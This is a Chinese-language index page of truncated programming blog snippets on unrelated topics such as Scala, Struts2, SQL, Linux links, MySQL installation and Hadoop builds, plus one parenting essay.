    原文地址: http://blog.sina.com.cn/s/blog_68af3f090100qkt8.html 对于学习 Scala 的 Java™ 开发人员来说,对象是一个比较自然、简单的入口点。在 本系列 前几期文章中,我介绍了 Scala 中一些面向对象的编程方法,这些方法实际上与 Java 编程的区别不是很大。我还向您展示了 Scala 如何重新应用传统的面向对象概念,找到其缺点
  • NullPointerException Cb123456 androidBaseAdapter
        java.lang.NullPointerException: Attempt to invoke virtual method 'int android.view.View.getImportantForAccessibility()' on a null object reference     出现以上异常.然后就在baidu上
  • PHP使用文件和目录 天子之骄 php文件和目录读取和写入php验证文件php锁定文件
    PHP使用文件和目录 1.使用include()包含文件 (1):使用include()从一个被包含文档返回一个值 (2):在控制结构中使用include()   include_once()函数需要一个包含文件的路径,此外,第一次调用它的情况和include()一样,如果在脚本执行中再次对同一个文件调用,那么这个文件不会再次包含。   在php.ini文件中设置
  • SQL SELECT DISTINCT 语句 何必如此 sql
    SELECT DISTINCT 语句用于返回唯一不同的值。 SQL SELECT DISTINCT 语句 在表中,一个列可能会包含多个重复值,有时您也许希望仅仅列出不同(distinct)的值。 DISTINCT 关键词用于返回唯一不同的值。 SQL SELECT DISTINCT 语法 SELECT DISTINCT column_name,column_name F
  • java冒泡排序 3213213333332132 java冒泡排序
    package com.algorithm; /** * @Description 冒泡 * @author FuJianyong * 2015-1-22上午09:58:39 */ public class MaoPao { public static void main(String[] args) { int[] mao = {17,50,26,18,9,10
  • struts2.18 +json,struts2-json-plugin-2.1.8.1.jar配置及问题! 7454103 DAOspringAjaxjsonqq
    struts2.18  出来有段时间了! (貌似是 稳定版)   闲时研究下下!  貌似 sruts2 搭配 json 做 ajax 很吃香!   实践了下下! 不当之处请绕过! 呵呵   网上一大堆 struts2+json  不过大多的json 插件 都是 jsonplugin.34.jar   strut
  • struts2 数据标签说明 darkranger jspbeanstrutsservletScheme
    数据标签主要用于提供各种数据访问相关的功能,包括显示一个Action里的属性,以及生成国际化输出等功能 数据标签主要包括: action :该标签用于在JSP页面中直接调用一个Action,通过指定executeResult参数,还可将该Action的处理结果包含到本页面来。 bean :该标签用于创建一个javabean实例。如果指定了id属性,则可以将创建的javabean实例放入Sta
  • 链表.简单的链表节点构建 aijuans 编程技巧
    /*编程环境WIN-TC*/ #include "stdio.h" #include "conio.h" #define NODE(name, key_word, help) \  Node name[1]={{NULL, NULL, NULL, key_word, help}} typedef struct node {  &nbs
  • tomcat下jndi的三种配置方式 avords tomcat
    jndi(Java Naming and Directory Interface,Java命名和目录接口)是一组在Java应用中访问命名和目录服务的API。命名服务将名称和对象联系起来,使得我们可以用名称 访问对象。目录服务是一种命名服务,在这种服务里,对象不但有名称,还有属性。          tomcat配置
  • 关于敏捷的一些想法 houxinyou 敏捷
    从网上看到这样一句话:“敏捷开发的最重要目标就是:满足用户多变的需求,说白了就是最大程度的让客户满意。” 感觉表达的不太清楚。 感觉容易被人误解的地方主要在“用户多变的需求”上。 第一种多变,实际上就是没有从根本上了解了用户的需求。用户的需求实际是稳定的,只是比较多,也比较混乱,用户一般只能了解自己的那一小部分,所以没有用户能清楚的表达出整体需求。而由于各种条件的,用户表达自己那一部分时也有
  • 富养还是穷养,决定孩子的一生 bijian1013 教育人生
    是什么决定孩子未来物质能否丰盛?为什么说寒门很难出贵子,三代才能出贵族?真的是父母必须有钱,才能大概率保证孩子未来富有吗?-----作者:@李雪爱与自由 事实并非由物质决定,而是由心灵决定。一朋友富有而且修养气质很好,兄弟姐妹也都如此。她的童年时代,物质上大家都很贫乏,但妈妈总是保持生活中的美感,时不时给孩子们带回一些美好小玩意,从来不对孩子传递生活艰辛、金钱来之不易、要懂得珍惜
  • oracle 日期时间格式转化 征客丶 oracle
    oracle 系统时间有 SYSDATE 与 SYSTIMESTAMP; SYSDATE:不支持毫秒,取的是系统时间; SYSTIMESTAMP:支持毫秒,日期,时间是给时区转换的,秒和毫秒是取的系统的。 日期转字符窜: 一、不取毫秒: TO_CHAR(SYSDATE, 'YYYY-MM-DD HH24:MI:SS') 简要说明, YYYY 年 MM   月
  • 【Scala六】分析Spark源代码总结的Scala语法四 bit1129 scala
    1. apply语法   FileShuffleBlockManager中定义的类ShuffleFileGroup,定义:   private class ShuffleFileGroup(val shuffleId: Int, val fileId: Int, val files: Array[File]) { ... def apply(bucketId
  • Erlang中有意思的bug bookjovi erlang
      代码中常有一些很搞笑的bug,如下面的一行代码被调用两次(Erlang beam) commit f667e4a47b07b07ed035073b94d699ff5fe0ba9b Author: Jovi Zhang <[email protected]> Date: Fri Dec 2 16:19:22 2011 +0100 erts:
  • 移位打印10进制数转16进制-2008-08-18 ljy325 java基础
    /** * Description 移位打印10进制的16进制形式 * Creation Date 15-08-2008 9:00 * @author 卢俊宇 * @version 1.0 * */ public class PrintHex { // 备选字符 static final char di
  • 读《研磨设计模式》-代码笔记-组合模式 bylijinnan java设计模式
    声明: 本文只为方便我个人查阅和理解,详细的分析以及源代码请移步 原作者的博客http://chjavach.iteye.com/ import java.util.ArrayList; import java.util.List; abstract class Component { public abstract void printStruct(Str
  • 利用cmd命令将.class文件打包成jar chenyu19891124 cmdjar
    cmd命令打jar是如下实现: 在运行里输入cmd,利用cmd命令进入到本地的工作盘符。(如我的是D盘下的文件有此路径 D:\workspace\prpall\WEB-INF\classes) 现在是想把D:\workspace\prpall\WEB-INF\classes路径下所有的文件打包成prpall.jar。然后继续如下操作: cd D: 回车 cd workspace/prpal
  • [原创]JWFD v0.96 工作流系统二次开发包 for Eclipse 简要说明 comsci eclipse设计模式算法工作swing
                           JWFD v0.96 工作流系统二次开发包 for Eclipse 简要说明     &nb
  • SecureCRT右键粘贴的设置 daizj secureCRT右键粘贴
    一般都习惯鼠标右键自动粘贴的功能,对于SecureCRT6.7.5 ,这个功能也已经是默认配置了。 老版本的SecureCRT其实也有这个功能,只是不是默认设置,很多人不知道罢了。 菜单: Options->Global Options ...->Terminal 右边有个Mouse的选项块。 Copy on Select Paste on Right/Middle
  • Linux 软链接和硬链接 dongwei_6688 linux
    1.Linux链接概念Linux链接分两种,一种被称为硬链接(Hard Link),另一种被称为符号链接(Symbolic Link)。默认情况下,ln命令产生硬链接。 【硬连接】硬连接指通过索引节点来进行连接。在Linux的文件系统中,保存在磁盘分区中的文件不管是什么类型都给它分配一个编号,称为索引节点号(Inode Index)。在Linux中,多个文件名指向同一索引节点是存在的。一般这种连
  • DIV底部自适应 dcj3sjt126com JavaScript
    <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml&q
  • Centos6.5使用yum安装mysql——快速上手必备 dcj3sjt126com mysql
    第1步、yum安装mysql [root@stonex ~]#  yum -y install mysql-server 安装结果: Installed:     mysql-server.x86_64 0:5.1.73-3.el6_5                   &nb
  • 如何调试JDK源码 frank1234 jdk
    相信各位小伙伴们跟我一样,想通过JDK源码来学习Java,比如collections包,java.util.concurrent包。 可惜的是sun提供的jdk并不能查看运行中的局部变量,需要重新编译一下rt.jar。 下面是编译jdk的具体步骤:         1.把C:\java\jdk1.6.0_26\sr
  • Maximal Rectangle hcx2013 max
    Given a 2D binary matrix filled with 0's and 1's, find the largest rectangle containing all ones and return its area.   public class Solution { public int maximalRectangle(char[][] matrix)
  • Spring MVC测试框架详解——服务端测试 jinnianshilongnian spring mvc test
    随着RESTful Web Service的流行,测试对外的Service是否满足期望也变的必要的。从Spring 3.2开始Spring了Spring Web测试框架,如果版本低于3.2,请使用spring-test-mvc项目(合并到spring3.2中了)。   Spring MVC测试框架提供了对服务器端和客户端(基于RestTemplate的客户端)提供了支持。 &nbs
  • Linux64位操作系统(CentOS6.6)上如何编译hadoop2.4.0 liyong0802 hadoop
    一、准备编译软件   1.在官网下载jdk1.7、maven3.2.1、ant1.9.4,解压设置好环境变量就可以用。     环境变量设置如下:   (1)执行vim /etc/profile (2)在文件尾部加入: export JAVA_HOME=/home/spark/jdk1.7 export MAVEN_HOME=/ho
  • StatusBar 字体白色 pangyulei status
    [[UIApplication sharedApplication] setStatusBarStyle:UIStatusBarStyleLightContent]; /*you'll also need to set UIViewControllerBasedStatusBarAppearance to NO in the plist file if you use this method
  • 如何分析Java虚拟机死锁 sesame javathreadoracle虚拟机jdbc
    英文资料: Thread Dump and Concurrency Locks   Thread dumps are very useful for diagnosing synchronization related problems such as deadlocks on object monitors. Ctrl-\ on Solaris/Linux or Ctrl-B
  • 位运算简介及实用技巧(一):基础篇 tw_wangzhengquan 位运算
    http://www.matrix67.com/blog/archives/263    去年年底写的关于位运算的日志是这个Blog里少数大受欢迎的文章之一,很多人都希望我能不断完善那篇文章。后来我看到了不少其它的资料,学习到了更多关于位运算的知识,有了重新整理位运算技巧的想法。从今天起我就开始写这一系列位运算讲解文章,与其说是原来那篇文章的follow-up,不如说是一个r
  • jsearch的索引文件结构 yangshangchuan 搜索引擎jsearch全文检索信息检索word分词
    jsearch是一个高性能的全文检索工具包,基于倒排索引,基于java8,类似于lucene,但更轻量级。   jsearch的索引文件结构定义如下:     1、一个词的索引由=分割的三部分组成:        第一部分是词        第二部分是这个词在多少
按字母分类: ABCDEFGHIJKLMNOPQRSTUVWXYZ其他